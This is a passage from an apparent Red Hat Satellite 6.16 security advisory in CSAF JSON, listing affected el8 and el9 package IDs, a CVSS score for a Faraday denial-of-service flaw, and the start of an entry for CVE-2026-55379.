"9Base-satellite-6.16-capsule:openvox-server-0:8.14.1-1.el9sat.src",
"9Base-satellite-6.16-capsule:python-pillow-0:12.3.0-1.el9pc.src",
"9Base-satellite-6.16-capsule:python-pillow-debugsource-0:12.3.0-1.el9pc.x86_64",
"9Base-satellite-6.16-capsule:python-pulp-container-0:2.20.10-2.el9pc.src",
"9Base-satellite-6.16-capsule:python-pyjwt-0:2.13.0-1.el9pc.src",
"9Base-satellite-6.16-capsule:python-pysequoia-0:0.1.33-1.el9pc.src",
"9Base-satellite-6.16-capsule:python3.11-pillow-0:12.3.0-1.el9pc.x86_64",
"9Base-satellite-6.16-capsule:python3.11-pillow-debuginfo-0:12.3.0-1.el9pc.x86_64",
"9Base-satellite-6.16-capsule:python3.11-pulp-container-0:2.20.10-2.el9pc.noarch",
"9Base-satellite-6.16-capsule:python3.11-pyjwt+crypto-0:2.13.0-1.el9pc.noarch",
"9Base-satellite-6.16-capsule:python3.11-pyjwt-0:2.13.0-1.el9pc.noarch",
"9Base-satellite-6.16-capsule:python3.11-pysequoia-0:0.1.33-1.el9pc.x86_64",
"9Base-satellite-6.16-capsule:rubygem-faraday-0:1.10.6-1.el9sat.noarch",
"9Base-satellite-6.16-capsule:rubygem-faraday-0:1.10.6-1.el9sat.src",
"9Base-satellite-6.16-capsule:rubygem-foreman_maintain-1:1.7.15-1.el9sat.noarch",
"9Base-satellite-6.16-capsule:rubygem-foreman_maintain-1:1.7.15-1.el9sat.src",
"9Base-satellite-6.16-capsule:rubygem-nokogiri-0:1.15.7-3.el9sat.src",
"9Base-satellite-6.16-capsule:rubygem-nokogiri-0:1.15.7-3.el9sat.x86_64",
"9Base-satellite-6.16-capsule:rubygem-nokogiri-debuginfo-0:1.15.7-3.el9sat.x86_64",
"9Base-satellite-6.16-capsule:rubygem-nokogiri-debugsource-0:1.15.7-3.el9sat.x86_64",
"9Base-satellite-6.16-capsule:satellite-0:6.16.12-1.el9sat.src",
"9Base-satellite-6.16-capsule:satellite-capsule-0:6.16.12-1.el9sat.noarch",
"9Base-satellite-6.16-capsule:satellite-common-0:6.16.12-1.el9sat.noarch",
"9Base-satellite-6.16-maintenance:rubygem-foreman_maintain-1:1.7.15-1.el9sat.noarch",
"9Base-satellite-6.16-maintenance:rubygem-foreman_maintain-1:1.7.15-1.el9sat.src",
"9Base-satellite-6.16-utils:satellite-0:6.16.12-1.el9sat.src",
"9Base-satellite-6.16-utils:satellite-cli-0:6.16.12-1.el9sat.noarch",
"9Base-satellite-6.16:foreman-installer-1:3.12.0.8-1.el9sat.noarch",
"9Base-satellite-6.16:foreman-installer-1:3.12.0.8-1.el9sat.src",
"9Base-satellite-6.16:foreman-installer-katello-1:3.12.0.8-1.el9sat.noarch",
"9Base-satellite-6.16:openvox-agent-0:8.24.1-3.el9sat.src",
"9Base-satellite-6.16:openvox-agent-0:8.24.1-3.el9sat.x86_64",
"9Base-satellite-6.16:openvox-server-0:8.14.1-1.el9sat.noarch",
"9Base-satellite-6.16:openvox-server-0:8.14.1-1.el9sat.src",
"9Base-satellite-6.16:python-pillow-0:12.3.0-1.el9pc.src",
"9Base-satellite-6.16:python-pillow-debugsource-0:12.3.0-1.el9pc.x86_64",
"9Base-satellite-6.16:python-pulp-container-0:2.20.10-2.el9pc.src",
"9Base-satellite-6.16:python-pyjwt-0:2.13.0-1.el9pc.src",
"9Base-satellite-6.16:python-pysequoia-0:0.1.33-1.el9pc.src",
"9Base-satellite-6.16:python3.11-pillow-0:12.3.0-1.el9pc.x86_64",
"9Base-satellite-6.16:python3.11-pillow-debuginfo-0:12.3.0-1.el9pc.x86_64",
"9Base-satellite-6.16:python3.11-pulp-container-0:2.20.10-2.el9pc.noarch",
"9Base-satellite-6.16:python3.11-pyjwt+crypto-0:2.13.0-1.el9pc.noarch",
"9Base-satellite-6.16:python3.11-pyjwt-0:2.13.0-1.el9pc.noarch",
"9Base-satellite-6.16:python3.11-pysequoia-0:0.1.33-1.el9pc.x86_64",
"9Base-satellite-6.16:rubygem-faraday-0:1.10.6-1.el9sat.noarch",
"9Base-satellite-6.16:rubygem-faraday-0:1.10.6-1.el9sat.src",
"9Base-satellite-6.16:rubygem-foreman_maintain-1:1.7.15-1.el9sat.noarch",
"9Base-satellite-6.16:rubygem-foreman_maintain-1:1.7.15-1.el9sat.src",
"9Base-satellite-6.16:rubygem-katello-0:4.14.0.21-1.el9sat.noarch",
"9Base-satellite-6.16:rubygem-katello-0:4.14.0.21-1.el9sat.src",
"9Base-satellite-6.16:rubygem-nokogiri-0:1.15.7-3.el9sat.src",
"9Base-satellite-6.16:rubygem-nokogiri-0:1.15.7-3.el9sat.x86_64",
"9Base-satellite-6.16:rubygem-nokogiri-debuginfo-0:1.15.7-3.el9sat.x86_64",
"9Base-satellite-6.16:rubygem-nokogiri-debugsource-0:1.15.7-3.el9sat.x86_64",
"9Base-satellite-6.16:satellite-0:6.16.12-1.el9sat.noarch",
"9Base-satellite-6.16:satellite-0:6.16.12-1.el9sat.src",
"9Base-satellite-6.16:satellite-cli-0:6.16.12-1.el9sat.noarch",
"9Base-satellite-6.16:satellite-common-0:6.16.12-1.el9sat.noarch",
"9Base-satellite-6.16:scap-security-guide-satellite-0:1.0.6-1.el9sat.noarch",
"9Base-satellite-6.16:scap-security-guide-satellite-0:1.0.6-1.el9sat.src"
]
}
],
"scores": [
{
"cvss_v3": {
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"availabilityImpact": "HIGH",
"baseScore": 7.5,
"baseSeverity": "HIGH",
"confidentialityImpact": "NONE",
"integrityImpact": "NONE",
"privilegesRequired": "NONE",
"scope": "UNCHANGED",
"userInteraction": "NONE",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H",
"version": "3.1"
},
"products": [
"8Base-satellite-6.16-capsule:foreman-installer-1:3.12.0.8-1.el8sat.noarch",
"8Base-satellite-6.16-capsule:foreman-installer-1:3.12.0.8-1.el8sat.src",
"8Base-satellite-6.16-capsule:foreman-installer-katello-1:3.12.0.8-1.el8sat.noarch",
"8Base-satellite-6.16-capsule:libsolv-1:0.7.20-7.el8sat.src",
"8Base-satellite-6.16-capsule:libsolv-1:0.7.20-7.el8sat.x86_64",
"8Base-satellite-6.16-capsule:libsolv-debuginfo-1:0.7.20-7.el8sat.x86_64",
"8Base-satellite-6.16-capsule:libsolv-debugsource-1:0.7.20-7.el8sat.x86_64",
"8Base-satellite-6.16-capsule:libsolv-demo-debuginfo-1:0.7.20-7.el8sat.x86_64",
"8Base-satellite-6.16-capsule:libsolv-tools-debuginfo-1:0.7.20-7.el8sat.x86_64",
"8Base-satellite-6.16-capsule:openvox-agent-0:8.24.1-3.el8sat.src",
"8Base-satellite-6.16-capsule:openvox-agent-0:8.24.1-3.el8sat.x86_64",
"8Base-satellite-6.16-capsule:openvox-server-0:8.14.1-1.el8sat.noarch",
"8Base-satellite-6.16-capsule:openvox-server-0:8.14.1-1.el8sat.src",
"8Base-satellite-6.16-capsule:perl-solv-debuginfo-1:0.7.20-7.el8sat.x86_64",
"8Base-satellite-6.16-capsule:python-pillow-0:12.3.0-1.el8pc.src",
"8Base-satellite-6.16-capsule:python-pillow-debugsource-0:12.3.0-1.el8pc.x86_64",
"8Base-satellite-6.16-capsule:python-pulp-container-0:2.20.10-2.el8pc.src",
"8Base-satellite-6.16-capsule:python-pyjwt-0:2.13.0-1.el8pc.src",
"8Base-satellite-6.16-capsule:python-pysequoia-0:0.1.33-1.el8pc.src",
"8Base-satellite-6.16-capsule:python3-solv-1:0.7.20-7.el8sat.x86_64",
"8Base-satellite-6.16-capsule:python3-solv-debuginfo-1:0.7.20-7.el8sat.x86_64",
"8Base-satellite-6.16-capsule:python3.11-pillow-0:12.3.0-1.el8pc.x86_64",
"8Base-satellite-6.16-capsule:python3.11-pillow-debuginfo-0:12.3.0-1.el8pc.x86_64",
"8Base-satellite-6.16-capsule:python3.11-pulp-container-0:2.20.10-2.el8pc.noarch",
"8Base-satellite-6.16-capsule:python3.11-pyjwt+crypto-0:2.13.0-1.el8pc.noarch",
"8Base-satellite-6.16-capsule:python3.11-pyjwt-0:2.13.0-1.el8pc.noarch",
"8Base-satellite-6.16-capsule:python3.11-pysequoia-0:0.1.33-1.el8pc.x86_64",
"8Base-satellite-6.16-capsule:ruby-solv-debuginfo-1:0.7.20-7.el8sat.x86_64",
"8Base-satellite-6.16-capsule:rubygem-faraday-0:1.10.6-1.el8sat.noarch",
"8Base-satellite-6.16-capsule:rubygem-faraday-0:1.10.6-1.el8sat.src",
"8Base-satellite-6.16-capsule:rubygem-foreman_maintain-1:1.7.15-1.el8sat.noarch",
"8Base-satellite-6.16-capsule:rubygem-foreman_maintain-1:1.7.15-1.el8sat.src",
"8Base-satellite-6.16-capsule:rubygem-nokogiri-0:1.15.7-3.el8sat.src",
"8Base-satellite-6.16-capsule:rubygem-nokogiri-0:1.15.7-3.el8sat.x86_64",
"8Base-satellite-6.16-capsule:rubygem-nokogiri-debuginfo-0:1.15.7-3.el8sat.x86_64",
"8Base-satellite-6.16-capsule:rubygem-nokogiri-debugsource-0:1.15.7-3.el8sat.x86_64",
"8Base-satellite-6.16-capsule:satellite-0:6.16.12-1.el8sat.src",
"8Base-satellite-6.16-capsule:satellite-capsule-0:6.16.12-1.el8sat.noarch",
"8Base-satellite-6.16-capsule:satellite-common-0:6.16.12-1.el8sat.noarch",
"8Base-satellite-6.16-maintenance:rubygem-foreman_maintain-1:1.7.15-1.el8sat.noarch",
"8Base-satellite-6.16-maintenance:rubygem-foreman_maintain-1:1.7.15-1.el8sat.src",
"8Base-satellite-6.16-utils:satellite-0:6.16.12-1.el8sat.src",
"8Base-satellite-6.16-utils:satellite-cli-0:6.16.12-1.el8sat.noarch",
"8Base-satellite-6.16:foreman-installer-1:3.12.0.8-1.el8sat.noarch",
"8Base-satellite-6.16:foreman-installer-1:3.12.0.8-1.el8sat.src",
"8Base-satellite-6.16:foreman-installer-katello-1:3.12.0.8-1.el8sat.noarch",
"8Base-satellite-6.16:libsolv-1:0.7.20-7.el8sat.src",
"8Base-satellite-6.16:libsolv-1:0.7.20-7.el8sat.x86_64",
"8Base-satellite-6.16:libsolv-debuginfo-1:0.7.20-7.el8sat.x86_64",
"8Base-satellite-6.16:libsolv-debugsource-1:0.7.20-7.el8sat.x86_64",
"8Base-satellite-6.16:libsolv-demo-debuginfo-1:0.7.20-7.el8sat.x86_64",
"8Base-satellite-6.16:libsolv-tools-debuginfo-1:0.7.20-7.el8sat.x86_64",
"8Base-satellite-6.16:openvox-agent-0:8.24.1-3.el8sat.src",
"8Base-satellite-6.16:openvox-agent-0:8.24.1-3.el8sat.x86_64",
"8Base-satellite-6.16:openvox-server-0:8.14.1-1.el8sat.noarch",
"8Base-satellite-6.16:openvox-server-0:8.14.1-1.el8sat.src",
"8Base-satellite-6.16:perl-solv-debuginfo-1:0.7.20-7.el8sat.x86_64",
"8Base-satellite-6.16:python-pillow-0:12.3.0-1.el8pc.src",
"8Base-satellite-6.16:python-pillow-debugsource-0:12.3.0-1.el8pc.x86_64",
"8Base-satellite-6.16:python-pulp-container-0:2.20.10-2.el8pc.src",
"8Base-satellite-6.16:python-pyjwt-0:2.13.0-1.el8pc.src",
"8Base-satellite-6.16:python-pysequoia-0:0.1.33-1.el8pc.src",
"8Base-satellite-6.16:python3-solv-1:0.7.20-7.el8sat.x86_64",
"8Base-satellite-6.16:python3-solv-debuginfo-1:0.7.20-7.el8sat.x86_64",
"8Base-satellite-6.16:python3.11-pillow-0:12.3.0-1.el8pc.x86_64",
"8Base-satellite-6.16:python3.11-pillow-debuginfo-0:12.3.0-1.el8pc.x86_64",
"8Base-satellite-6.16:python3.11-pulp-container-0:2.20.10-2.el8pc.noarch",
"8Base-satellite-6.16:python3.11-pyjwt+crypto-0:2.13.0-1.el8pc.noarch",
"8Base-satellite-6.16:python3.11-pyjwt-0:2.13.0-1.el8pc.noarch",
"8Base-satellite-6.16:python3.11-pysequoia-0:0.1.33-1.el8pc.x86_64",
"8Base-satellite-6.16:ruby-solv-debuginfo-1:0.7.20-7.el8sat.x86_64",
"8Base-satellite-6.16:rubygem-faraday-0:1.10.6-1.el8sat.noarch",
"8Base-satellite-6.16:rubygem-faraday-0:1.10.6-1.el8sat.src",
"8Base-satellite-6.16:rubygem-foreman_maintain-1:1.7.15-1.el8sat.noarch",
"8Base-satellite-6.16:rubygem-foreman_maintain-1:1.7.15-1.el8sat.src",
"8Base-satellite-6.16:rubygem-katello-0:4.14.0.21-1.el8sat.noarch",
"8Base-satellite-6.16:rubygem-katello-0:4.14.0.21-1.el8sat.src",
"8Base-satellite-6.16:rubygem-nokogiri-0:1.15.7-3.el8sat.src",
"8Base-satellite-6.16:rubygem-nokogiri-0:1.15.7-3.el8sat.x86_64",
"8Base-satellite-6.16:rubygem-nokogiri-debuginfo-0:1.15.7-3.el8sat.x86_64",
"8Base-satellite-6.16:rubygem-nokogiri-debugsource-0:1.15.7-3.el8sat.x86_64",
"8Base-satellite-6.16:satellite-0:6.16.12-1.el8sat.noarch",
"8Base-satellite-6.16:satellite-0:6.16.12-1.el8sat.src",
"8Base-satellite-6.16:satellite-cli-0:6.16.12-1.el8sat.noarch",
"8Base-satellite-6.16:satellite-common-0:6.16.12-1.el8sat.noarch",
"8Base-satellite-6.16:scap-security-guide-satellite-0:1.0.6-1.el8sat.noarch",
"8Base-satellite-6.16:scap-security-guide-satellite-0:1.0.6-1.el8sat.src",
"9Base-satellite-6.16-capsule:foreman-installer-1:3.12.0.8-1.el9sat.noarch",
"9Base-satellite-6.16-capsule:foreman-installer-1:3.12.0.8-1.el9sat.src",
"9Base-satellite-6.16-capsule:foreman-installer-katello-1:3.12.0.8-1.el9sat.noarch",
"9Base-satellite-6.16-capsule:openvox-agent-0:8.24.1-3.el9sat.src",
"9Base-satellite-6.16-capsule:openvox-agent-0:8.24.1-3.el9sat.x86_64",
"9Base-satellite-6.16-capsule:openvox-server-0:8.14.1-1.el9sat.noarch",
"9Base-satellite-6.16-capsule:openvox-server-0:8.14.1-1.el9sat.src",
"9Base-satellite-6.16-capsule:python-pillow-0:12.3.0-1.el9pc.src",
"9Base-satellite-6.16-capsule:python-pillow-debugsource-0:12.3.0-1.el9pc.x86_64",
"9Base-satellite-6.16-capsule:python-pulp-container-0:2.20.10-2.el9pc.src",
"9Base-satellite-6.16-capsule:python-pyjwt-0:2.13.0-1.el9pc.src",
"9Base-satellite-6.16-capsule:python-pysequoia-0:0.1.33-1.el9pc.src",
"9Base-satellite-6.16-capsule:python3.11-pillow-0:12.3.0-1.el9pc.x86_64",
"9Base-satellite-6.16-capsule:python3.11-pillow-debuginfo-0:12.3.0-1.el9pc.x86_64",
"9Base-satellite-6.16-capsule:python3.11-pulp-container-0:2.20.10-2.el9pc.noarch",
"9Base-satellite-6.16-capsule:python3.11-pyjwt+crypto-0:2.13.0-1.el9pc.noarch",
"9Base-satellite-6.16-capsule:python3.11-pyjwt-0:2.13.0-1.el9pc.noarch",
"9Base-satellite-6.16-capsule:python3.11-pysequoia-0:0.1.33-1.el9pc.x86_64",
"9Base-satellite-6.16-capsule:rubygem-faraday-0:1.10.6-1.el9sat.noarch",
"9Base-satellite-6.16-capsule:rubygem-faraday-0:1.10.6-1.el9sat.src",
"9Base-satellite-6.16-capsule:rubygem-foreman_maintain-1:1.7.15-1.el9sat.noarch",
"9Base-satellite-6.16-capsule:rubygem-foreman_maintain-1:1.7.15-1.el9sat.src",
"9Base-satellite-6.16-capsule:rubygem-nokogiri-0:1.15.7-3.el9sat.src",
"9Base-satellite-6.16-capsule:rubygem-nokogiri-0:1.15.7-3.el9sat.x86_64",
"9Base-satellite-6.16-capsule:rubygem-nokogiri-debuginfo-0:1.15.7-3.el9sat.x86_64",
"9Base-satellite-6.16-capsule:rubygem-nokogiri-debugsource-0:1.15.7-3.el9sat.x86_64",
"9Base-satellite-6.16-capsule:satellite-0:6.16.12-1.el9sat.src",
"9Base-satellite-6.16-capsule:satellite-capsule-0:6.16.12-1.el9sat.noarch",
"9Base-satellite-6.16-capsule:satellite-common-0:6.16.12-1.el9sat.noarch",
"9Base-satellite-6.16-maintenance:rubygem-foreman_maintain-1:1.7.15-1.el9sat.noarch",
"9Base-satellite-6.16-maintenance:rubygem-foreman_maintain-1:1.7.15-1.el9sat.src",
"9Base-satellite-6.16-utils:satellite-0:6.16.12-1.el9sat.src",
"9Base-satellite-6.16-utils:satellite-cli-0:6.16.12-1.el9sat.noarch",
"9Base-satellite-6.16:foreman-installer-1:3.12.0.8-1.el9sat.noarch",
"9Base-satellite-6.16:foreman-installer-1:3.12.0.8-1.el9sat.src",
"9Base-satellite-6.16:foreman-installer-katello-1:3.12.0.8-1.el9sat.noarch",
"9Base-satellite-6.16:openvox-agent-0:8.24.1-3.el9sat.src",
"9Base-satellite-6.16:openvox-agent-0:8.24.1-3.el9sat.x86_64",
"9Base-satellite-6.16:openvox-server-0:8.14.1-1.el9sat.noarch",
"9Base-satellite-6.16:openvox-server-0:8.14.1-1.el9sat.src",
"9Base-satellite-6.16:python-pillow-0:12.3.0-1.el9pc.src",
"9Base-satellite-6.16:python-pillow-debugsource-0:12.3.0-1.el9pc.x86_64",
"9Base-satellite-6.16:python-pulp-container-0:2.20.10-2.el9pc.src",
"9Base-satellite-6.16:python-pyjwt-0:2.13.0-1.el9pc.src",
"9Base-satellite-6.16:python-pysequoia-0:0.1.33-1.el9pc.src",
"9Base-satellite-6.16:python3.11-pillow-0:12.3.0-1.el9pc.x86_64",
"9Base-satellite-6.16:python3.11-pillow-debuginfo-0:12.3.0-1.el9pc.x86_64",
"9Base-satellite-6.16:python3.11-pulp-container-0:2.20.10-2.el9pc.noarch",
"9Base-satellite-6.16:python3.11-pyjwt+crypto-0:2.13.0-1.el9pc.noarch",
"9Base-satellite-6.16:python3.11-pyjwt-0:2.13.0-1.el9pc.noarch",
"9Base-satellite-6.16:python3.11-pysequoia-0:0.1.33-1.el9pc.x86_64",
"9Base-satellite-6.16:rubygem-faraday-0:1.10.6-1.el9sat.noarch",
"9Base-satellite-6.16:rubygem-faraday-0:1.10.6-1.el9sat.src",
"9Base-satellite-6.16:rubygem-foreman_maintain-1:1.7.15-1.el9sat.noarch",
"9Base-satellite-6.16:rubygem-foreman_maintain-1:1.7.15-1.el9sat.src",
"9Base-satellite-6.16:rubygem-katello-0:4.14.0.21-1.el9sat.noarch",
"9Base-satellite-6.16:rubygem-katello-0:4.14.0.21-1.el9sat.src",
"9Base-satellite-6.16:rubygem-nokogiri-0:1.15.7-3.el9sat.src",
"9Base-satellite-6.16:rubygem-nokogiri-0:1.15.7-3.el9sat.x86_64",
"9Base-satellite-6.16:rubygem-nokogiri-debuginfo-0:1.15.7-3.el9sat.x86_64",
"9Base-satellite-6.16:rubygem-nokogiri-debugsource-0:1.15.7-3.el9sat.x86_64",
"9Base-satellite-6.16:satellite-0:6.16.12-1.el9sat.noarch",
"9Base-satellite-6.16:satellite-0:6.16.12-1.el9sat.src",
"9Base-satellite-6.16:satellite-cli-0:6.16.12-1.el9sat.noarch",
"9Base-satellite-6.16:satellite-common-0:6.16.12-1.el9sat.noarch",
"9Base-satellite-6.16:scap-security-guide-satellite-0:1.0.6-1.el9sat.noarch",
"9Base-satellite-6.16:scap-security-guide-satellite-0:1.0.6-1.el9sat.src"
]
}
],
"threats": [
{
"category": "impact",
"details": "Important"
}
],
"title": "faraday: Faraday: Denial of Service via crafted nested query strings"
},
{
"cve": "CVE-2026-55379",
"cwe": {
"id": "CWE-770",
"name": "Allocation of Resources Without Limits or Throttling"
},
"discovery_date": "2026-07-06T20:01:29.922515+00:00",
"flags": [
{
"label": "vulnerable_code_not_present",
"product_ids": [
"8Base-satellite-6.16-capsule:foreman-installer-1:3.12.0.8-1.el8sat.noarch",
"8Base-satellite-6.16-capsule:foreman-installer-1:3.12.0.8-1.el8sat.src",
"8Base-satellite-6.16-capsule:foreman-installer-katello-1:3.12.0.8-1.el8sat.noarch",
"8Base-satellite-6.16-capsule:libsolv-1:0.7.20-7.el8sat.src",
"8Base-satellite-6.16-capsule:libsolv-1:0.7.20-7.el8sat.x86_64",
"8Base-satellite-6.16-capsule:libsolv-debuginfo-1:0.7.20-7.el8sat.x86_64",
"8Base-satellite-6.16-capsule:libsolv-debugsource-1:0.7.20-7.el8sat.x86_64",
"8Base-satellite-6.16-capsule:libsolv-demo-debuginfo-1:0.7.20-7.el8sat.x86_64",
"8Base-satellite-6.16-capsule:libsolv-tools-debuginfo-1:0.7.20-7.el8sat.x86_64",
"8Base-satellite-6.16-capsule:openvox-agent-0:8.24.1-3.el8sat.src",
"8Base-satellite-6.16-capsule:openvox-agent-0:8.24.1-3.el8sat.x86_64",
"8Base-satellite-6.16-capsule:openvox-server-0:8.14.1-1.el8sat.noarch",
"8Base-satellite-6.16-capsule:openvox-server-0:8.14.1-1.el8sat.src",
"8Base-satellite-6.16-capsule:perl-solv-debuginfo-1:0.7.20-7.el8sat.x86_64",
"8Base-satellite-6.16-capsule:python-pulp-container-0:2.20.10-2.el8pc.src",
"8Base-satellite-6.16-capsule:python-pyjwt-0:2.13.0-1.el8pc.src",
"8Base-satellite-6.16-capsule:python-pysequoia-0:0.1.33-1.el8pc.src",
"8Base-satellite-6.16-capsule:python3-solv-1:0.7.20-7.el8sat.x86_64",
"8Base-satellite-6.16-capsule:python3-solv-debuginfo-1:0.7.20-7.el8sat.x86_64",
"8Base-satellite-6.16-capsule:python3.11-pulp-container-0:2.20.10-2.el8pc.noarch",
"8Base-satellite-6.16-capsule:python3.11-pyjwt+crypto-0:2.13.0-1.el8pc.noarch",
"8Base-satellite-6.16-capsule:python3.11-pyjwt-0:2.13.0-1.el8pc.noarch",
"8Base-satellite-6.16-capsule:python3.11-pysequoia-0:0.1.33-1.el8pc.x86_64",
"8Base-satellite-6.16-capsule:ruby-solv-debuginfo-1:0.7.20-7.el8sat.x86_64",
"8Base-satellite-6.16-capsule:rubygem-faraday-0:1.10.6-1.el8sat.noarch",
"8Base-satellite-6.16-capsule:rubygem-faraday-0:1.10.6-1.el8sat.src",
"8Base-satellite-6.16-capsule:rubygem-foreman_maintain-1:1.7.15-1.el8sat.noarch",
"8Base-satellite-6.16-capsule:rubygem-foreman_maintain-1:1.7.15-1.el8sat.src",
"8Base-satellite-6.16-capsule:rubygem-nokogiri-0:1.15.7-3.el8sat.src",
"8Base-satellite-6.16-capsule:rubygem-nokogiri-0:1.15.7-3.el8sat.x86_64",
"8Base-satellite-6.16-capsule:rubygem-nokogiri-debuginfo-0:1.15.7-3.el8sat.x86_64",
"8Base-satellite-6.16-capsule:rubygem-nokogiri-debugsource-0:1.15.7-3.el8sat.x86_64",
"8Base-satellite-6.16-capsule:satellite-0:6.16.12-1.el8sat.src",
"8Base-satellite-6.16-capsule:satellite-capsule-0:6.16.12-1.el8sat.noarch",
"8Base-satellite-6.16-capsule:satellite-common-0:6.16.12-1.el8sat.noarch",
"8Base-satellite-6.16-maintenance:rubygem-foreman_maintain-1:1.7.15-1.el8sat.noarch",
"8Base-satellite-6.16-maintenance:rubygem-foreman_maintain-1:1.7.15-1.el8sat.src",
"8Base-satellite-6.16-utils:satellite-0:6.16.12-1.el8sat.src",
"8Base-satellite-6.16-utils:satellite-cli-0:6.16.12-1.el8sat.noarch",
"8Base-satellite-6.16:foreman-installer-1:3.12.0.8-1.el8sat.noarch",
"8Base-satellite-6.16:foreman-installer-1:3.12.0.8-1.el8sat.src",
"8Base-satellite-6.16:foreman-installer-katello-1:3.12.0.8-1.el8sat.noarch",
"8Base-satellite-6.16:libsolv-1:0.7.20-7.el8sat.src",
"8Base-satellite-6.16:libsolv-1:0.7.20-7.el8sat.x86_64",
"8Base-satellite-6.16:libsolv-debuginfo-1:0.7.20-7.el8sat.x86_64",
"8Base-satellite-6.16:libsolv-debugsource-1:0.7.20-7.el8sat.x86_64",
"8Base-satellite-6.16:libsolv-demo-debuginfo-1:0.7.20-7.el8sat.x86_64",
"8Base-satellite-6.16:libsolv-tools-debuginfo-1:0.7.20-7.el8sat.x86_64",
"8Base-satellite-6.16:openvox-agent-0:8.24.1-3.el8sat.src",
"8Base-satellite-6.16:openvox-agent-0:8.24.1-3.el8sat.x86_64",
"8Base-satellite-6.16:openvox-server-0:8.14.1-1.el8sat.noarch",
"8Base-satellite-6.16:openvox-server-0:8.14.1-1.el8sat.src",
"8Base-satellite-6.16:perl-solv-debuginfo-1:0.7.20-7.el8sat.x86_64",
"8Base-satellite-6.16:python-pulp-container-0:2.20.10-2.el8pc.src",
"8Base-satellite-6.16:python-pyjwt-0:2.13.0-1.el8pc.src",
"8Base-satellite-6.16:python-pysequoia-0:0.1.33-1.el8pc.src",
"8Base-satellite-6.16:python3-solv-1:0.7.20-7.el8sat.x86_64",
"8Base-satellite-6.16:python3-solv-debuginfo-1:0.7.20-7.el8sat.x86_64",
"8Base-satellite-6.16:python3.11-pulp-container-0:2.20.10-2.el8pc.noarch",
"8Base-satellite-6.16:python3.11-pyjwt+crypto-0:2.13.0-1.el8pc.noarch",
"8Base-satellite-6.16:python3.11-pyjwt-0:2.13.0-1.el8pc.noarch",
"8Base-satellite-6.16:python3.11-pysequoia-0:0.1.33-1.el8pc.x86_64",
"8Base-satellite-6.16:ruby-solv-debuginfo-1:0.7.20-7.el8sat.x86_64",
"8Base-satellite-6.16:rubygem-faraday-0:1.10.6-1.el8sat.noarch",
"8Base-satellite-6.16:rubygem-faraday-0:1.10.6-1.el8sat.src",
"8Base-satellite-6.16:rubygem-foreman_maintain-1:1.7.15-1.el8sat.noarch",
"8Base-satellite-6.16:rubygem-foreman_maintain-1:1.7.15-1.el8sat.src",
"8Base-satellite-6.16:rubygem-katello-0:4.14.0.21-1.el8sat.noarch",
"8Base-satellite-6.16:rubygem-katello-0:4.14.0.21-1.el8sat.src",
"8Base-satellite-6.16:rubygem-nokogiri-0:1.15.7-3.el8sat.src",
"8Base-satellite-6.16:rubygem-nokogiri-0:1.15.7-3.el8sat.x86_64",
"8Base-satellite-6.16:rubygem-nokogiri-debuginfo-0:1.15.7-3.el8sat.x86_64",
"8Base-satellite-6.16:rubygem-nokogiri-debugsource-0:1.15.7-3.el8sat.x86_64",
"8Base-satellite-6.16:satellite-0:6.16.12-1.el8sat.noarch",
"8Base-satellite-6.16:satellite-0:6.16.12-1.el8sat.src",
"8Base-satellite-6.16:satellite-cli-0:6.16.12-1.el8sat.noarch",
"8Base-satellite-6.16:satellite-common-0:6.16.12-1.el8sat.noarch",
"8Base-satellite-6.16:scap-security-guide-satellite-0:1.0.6-1.el8sat.noarch",
"8Base-satellite-6.16:scap-security-guide-satellite-0:1.0.6-1.el8sat.src",
"9Base-satellite-6.16-capsule:foreman-installer-1:3.12.0.8-1.el9sat.noarch",
"9Base-satellite-6.16-capsule:foreman-installer-1:3.12.0.8-1.el9sat.src",
"9Base-satellite-6.16-capsule:foreman-installer-katello-1:3.12.0.8-1.el9sat.noarch",
"9Base-satellite-6.16-capsule:openvox-agent-0:8.24.1-3.el9sat.src",
"9Base-satellite-6.16-capsule:openvox-agent-0:8.24.1-3.el9sat.x86_64",
"9Base-satellite-6.16-capsule:openvox-server-0:8.14.1-1.el9sat.noarch",
"9Base-satellite-6.16-capsule:openvox-server-0:8.14.1-1.el9sat.src",
"9Base-satellite-6.16-capsule:python-pulp-container-0:2.20.10-2.el9pc.src",
"9Base-satellite-6.16-capsule:python-pyjwt-0:2.13.0-1.el9pc.src",
"9Base-satellite-6.16-capsule:python-pysequoia-0:0.1.33-1.el9pc.src",
"9Base-satellite-6.16-capsule:python3.11-pulp-container-0:2.20.10-2.el9pc.noarch",
"9Base-satellite-6.16-capsule:python3.11-pyjwt+crypto-0:2.13.0-1.el9pc.noarch",
"9Base-satellite-6.16-capsule:python3.11-pyjwt-0:2.13.0-1.el9pc.noarch",
"9Base-satellite-6.16-capsule:python3.11-pysequoia-0:0.1.33-1.el9pc.x86_64",
"9Base-satellite-6.16-capsule:rubygem-faraday-0:1.10.6-1.el9sat.noarch",
"9Base-satellite-6.16-capsule:rubygem-faraday-0:1.10.6-1.el9sat.src",
"9Base-satellite-6.16-capsule:rubygem-foreman_maintain-1:1.7.15-1.el9sat.noarch",
"9Base-satellite-6.16-capsule:rubygem-foreman_maintain-1:1.7.15-1.el9sat.src",
"9Base-satellite-6.16-capsule:rubygem-nokogiri-0:1.15.7-3.el9sat.src",
"9Base-satellite-6.16-capsule:rubygem-nokogiri-0:1.15.7-3.el9sat.x86_64",
"9Base-satellite-6.16-capsule:rubygem-nokogiri-debuginfo-0:1.15.7-3.el9sat.x86_64",
"9Base-satellite-6.16-capsule:rubygem-nokogiri-debugsource-0:1.15.7-3.el9sat.x86_64",
"9Base-satellite-6.16-capsule:satellite-0:6.16.12-1.el9sat.src",
"9Base-satellite-6.16-capsule:satellite-capsule-0:6.16.12-1.el9sat.noarch",
"9Base-satellite-6.16-capsule:satellite-common-0:6.16.12-1.el9sat.noarch",
"9Base-satellite-6.16-maintenance:rubygem-foreman_maintain-1:1.7.15-1.el9sat.noarch",
"9Base-satellite-6.16-maintenance:rubygem-foreman_maintain-1:1.7.15-1.el9sat.src",
"9Base-satellite-6.16-utils:satellite-0:6.16.12-1.el9sat.src",
"9Base-satellite-6.16-utils:satellite-cli-0:6.16.12-1.el9sat.noarch",
"9Base-satellite-6.16:foreman-installer-1:3.12.0.8-1.el9sat.noarch",
"9Base-satellite-6.16:foreman-installer-1:3.12.0.8-1.el9sat.src",
"9Base-satellite-6.16:foreman-installer-katello-1:3.12.0.8-1.el9sat.noarch",
"9Base-satellite-6.16:openvox-agent-0:8.24.1-3.el9sat.src",
